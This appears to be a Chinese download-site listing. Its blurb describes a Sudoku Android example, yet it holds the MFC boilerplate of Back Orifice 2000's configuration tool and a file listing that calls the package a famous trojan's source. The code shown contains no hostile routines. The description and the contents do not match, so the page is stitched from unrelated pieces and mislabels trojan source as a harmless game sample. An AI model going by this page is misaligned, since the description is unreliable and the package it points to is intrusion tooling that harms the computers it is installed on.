资源简介

数独游戏是一个出色的android实例程序,该游戏非常简单

资源截图

代码片段和文件信息

/*  Back Orifice 2000 - Remote Administration Suite
    Copyright (C) 1999 Cult Of The Dead Cow

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not write to the Free Software
    Foundation Inc. 59 Temple Place Suite 330 Boston MA  02111-1307  USA

The author of this program may be contacted at dildog@l0pht.com. */


// bo2kcfg.cpp : Defines the class behaviors for the application.
//

#include “stdafx.h“
#include “bo2kcfg.h“
#include “bo2kcfgDlg.h“
#include “osversion.h“
#include “dll_load.h“

#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

/////////////////////////////////////////////////////////////////////////////
// CBo2kcfgApp

BEGIN_MESSAGE_MAP(CBo2kcfgApp CWinApp)
//{{AFX_MSG_MAP(CBo2kcfgApp)
// NOTE - the ClassWizard will add and remove mapping macros here.
//    DO NOT EDIT what you see in these blocks of generated code!
//}}AFX_MSG
ON_COMMAND(ID_HELP CWinApp::onhelp)
END_MESSAGE_MAP()

/////////////////////////////////////////////////////////////////////////////
// CBo2kcfgApp construction

CBo2kcfgApp::CBo2kcfgApp()
{
// TODO: add construction code here
// Place all significant initialization in InitInstance
}

/////////////////////////////////////////////////////////////////////////////
// The one and only CBo2kcfgApp object

CBo2kcfgApp theApp;

/////////////////////////////////////////////////////////////////////////////
// CBo2kcfgApp initialization

BOOL CBo2kcfgApp::InitInstance()
{
// Standard initialization
// If you are not using these features and wish to reduce the size
//  of your final executable you should remove from the following
//  the specific initialization routines you do not need.

#ifdef _AFXDLL
Enable3dControls(); // Call this when using MFC in a shared DLL
#else
Enable3dControlsStatic(); // Call this when linking to MFC statically
#endif

SetRegistryKey(_T(“Cult Of The Dead Cow“));

// Get Operating System Version
GetOSVersion();

// Start up DLL Loader
InitializeDLLLoad();

// Do modal dialog
CBo2kcfgDlg dlg;
m_pMainWnd = &dlg;
int nResponse = dlg.DoModal();
if (nResponse == IDOK)
{

}

// Release DLL Loader
KillDLLLoad();


return FALSE;
}

void CBo2kcfgApp::SetRegKey(char *svKey)
{
SetRegistryKey(svKey);
}

 属性            大小     日期    时间   名称
----------- ---------  ---------- -----  ----

     文件      16201  1999-07-16 14:54  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2k.dsp

     文件       1924  1999-07-04 22:51  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2k.dsw

     文件     418816  2009-07-20 17:03  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2k.ncb

     文件      73216  2009-07-20 17:03  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2k.opt

     文件      67504  2009-06-17 16:11  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2kcfg\bo2kcfg.aps

     文件       2946  1999-07-04 22:51  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2kcfg\bo2kcfg.cpp

     文件       6384  1999-07-04 22:51  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2kcfg\bo2kcfg.dsp

     文件       2276  1999-07-04 22:51  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2kcfg\bo2kcfg.h

     文件      16759  1999-07-04 22:51  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2kcfg\bo2kcfg.rc

     文件      31018  1999-07-04 22:51  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2kcfg\bo2kcfgDlg.cpp

     文件       3898  1999-07-04 22:51  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2kcfg\bo2kcfgDlg.h

     文件        134  1999-07-04 22:51  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2kcfg\mssccprj.scc

     文件      19320  1999-07-04 22:51  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2kcfg\res\banner1.bmp

     文件       1142  1999-07-04 22:51  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2kcfg\res\bitmap1.bmp

     文件       1078  1999-07-04 22:51  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2kcfg\res\bo2kcfg.ico

     文件        399  1999-07-04 22:51  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2kcfg\res\bo2kcfg.rc2

     文件       9790  1999-07-04 22:51  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2kcfg\res\bo2kcfgbanner.bmp

     文件       2104  1999-07-04 22:51  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2kcfg\res\buttwizard.bmp

     文件       2238  1999-07-04 22:51  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2kcfg\res\icon1.ico

     文件        318  1999-07-04 22:51  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2kcfg\res\littleco.ico

     文件        160  1999-07-04 22:51  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2kcfg\res\vssver.scc

     文件       2556  1999-07-04 22:51  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2kcfg\Resource.h

     文件       1119  1999-07-04 22:51  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2kcfg\StdAfx.cpp

     文件       1849  1999-07-04 22:51  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2kcfg\StdAfx.h

     文件        400  1999-07-04 22:51  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2kcfg\vssver.scc

     文件       1986  1999-07-04 22:51  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2kcfg\Wizard1.cpp

     文件       2076  1999-07-04 22:51  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2kcfg\Wizard1.h

     文件       2183  1999-07-04 22:51  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2kcfg\Wizard2.cpp

     文件       2102  1999-07-04 22:51  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2kcfg\Wizard2.h

     文件       2294  1999-07-04 22:51  vc++著名的木马程序BO2000源代码\vc++著名的木马程序BO2000源代码\bo2kcfg\Wizard3.cpp

............此处省略336个文件信息

评论

共有 条评论